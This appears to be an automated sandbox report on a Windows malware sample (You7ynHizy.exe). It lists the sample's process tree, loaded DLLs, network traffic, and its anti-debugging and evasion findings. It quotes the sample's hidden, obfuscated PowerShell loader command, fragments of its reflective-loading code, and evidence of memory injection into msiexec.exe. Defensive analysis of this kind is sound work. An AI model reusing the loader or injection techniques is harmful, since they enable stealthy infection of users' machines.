      Source: msiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3157176290.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012230458.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733926611.00000000076B2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe String found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe String found in binary or memory: https://www.google.com
      Source: msiexec.exe String found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe String found in binary or memory: https://www.gstatic.com
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49917 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:49923 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49967 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49985 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49995 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49999 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:50000 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50007 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50015 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50017 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50019 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50023 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50025 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:50028 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50029 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50031 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50033 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50035 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50039 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50041 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50043 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50046 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50048 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:50049 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50052 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50054 version: TLS 1.2
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

      System Summary

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_00404C7B
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0476DFE0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0719CC66
      Source: You7ynHizy.exe Static PE information: invalid certificate
      Source: You7ynHizy.exe, 00000000.00000000.2129718746.00000000007D4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs You7ynHizy.exe
      Source: You7ynHizy.exe Binary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs You7ynHizy.exe
      Source: You7ynHizy.exe.2.dr Binary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs You7ynHizy.exe
      Source: You7ynHizy.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine Classification label: mal100.troj.evad.winEXE@6/12@2/2
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_00402104 CoCreateInstance
      Source: C:\Users\user\Desktop\You7ynHizy.exe File created: C:\Users\user\AppData\Local\downrange
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
      Source: C:\Users\user\Desktop\You7ynHizy.exe File created: C:\Users\user\AppData\Local\Temp\nst46C3.tmp
      Source: You7ynHizy.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\You7ynHizy.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\You7ynHizy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: You7ynHizy.exe Virustotal: Detection: 65%
      Source: You7ynHizy.exe ReversingLabs: Detection: 65%
      Source: C:\Users\user\Desktop\You7ynHizy.exe File read: C:\Users\user\Desktop\You7ynHizy.exe
      Source: unknown Process created: C:\Users\user\Desktop\You7ynHizy.exe "C:\Users\user\Desktop\You7ynHizy.exe"
      Source: C:\Users\user\Desktop\You7ynHizy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
      Source: C:\Users\user\Desktop\You7ynHizy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\You7ynHizy.exe Section loaded: textshaping.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
      Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
      Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
      Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: You7ynHizy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2522365385.00000000081C3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb7 source: powershell.exe, 00000002.00000002.2511053317.0000000002BC9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2516957835.0000000007092000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2516957835.0000000007092000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: Yara match File source: 00000002.00000002.2532691410.0000000009A59000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000008.00000002.3375229817.0000000004F19000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Phlogogenous $Pictography $outfacing), (Porser @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sondre = [AppDomain]::CurrentDomain.GetAssemblies()$global:S
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Danseskolen)), $Polering).DefineDynamicModule($boligformaalet, $false).DefineType($Institutraads, $Diskusprolapsernes, [System.Multica
      Source: C:\Users\user\Desktop\You7ynHizy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0476CE82 push eax; mov dword ptr [esp], edx 2_2_0476CE94
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0719B644 push 8B6BF5BAh; iretd 2_2_0719B649
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0719F926 push ss; iretd 2_2_0719F927
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08F841A1 push 3B634E4Eh; ret 2_2_08F841AD
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08F84548 push 8BD38B50h; iretd 2_2_08F8454E
      Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_04464ADD push es; ret 8_2_04464AE0
      Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_04460A8E push esp; iretd 8_2_04460A91
      Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_04463C95 push edx; iretd 8_2_04463C96
      Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_04466B5D push esp; retf 8_2_04466B5E
      Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_04465F77 push ebx; retf 8_2_04465F7B
      Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_044641D1 pushfd ; retf 8_2_044641D4
      Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_044647ED push esi; ret 8_2_044647EE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\Desktop\You7ynHizy.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6297
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3412
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460 Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 5764 Thread sleep count: 34 > 30
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 5764 Thread sleep time: -340000s >= -30000s
      Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_004065DA FindFirstFileW, FindClose, 0_2_004065DA
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_004059A9 GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose, 0_2_004059A9
      Source: msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007666000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\You7ynHizy.exe API call chain: ExitProcess graph end node graph_0-3397
      Source: C:\Users\user\Desktop\You7ynHizy.exe API call chain: ExitProcess graph end node graph_0-3550
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

      Anti Debugging

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
      Source: C:\Windows\SysWOW64\msiexec.exe Thread information set: HideFromDebugger
      Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0097F300 LdrInitializeThunk, LdrInitializeThunk, 2_2_0097F300
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
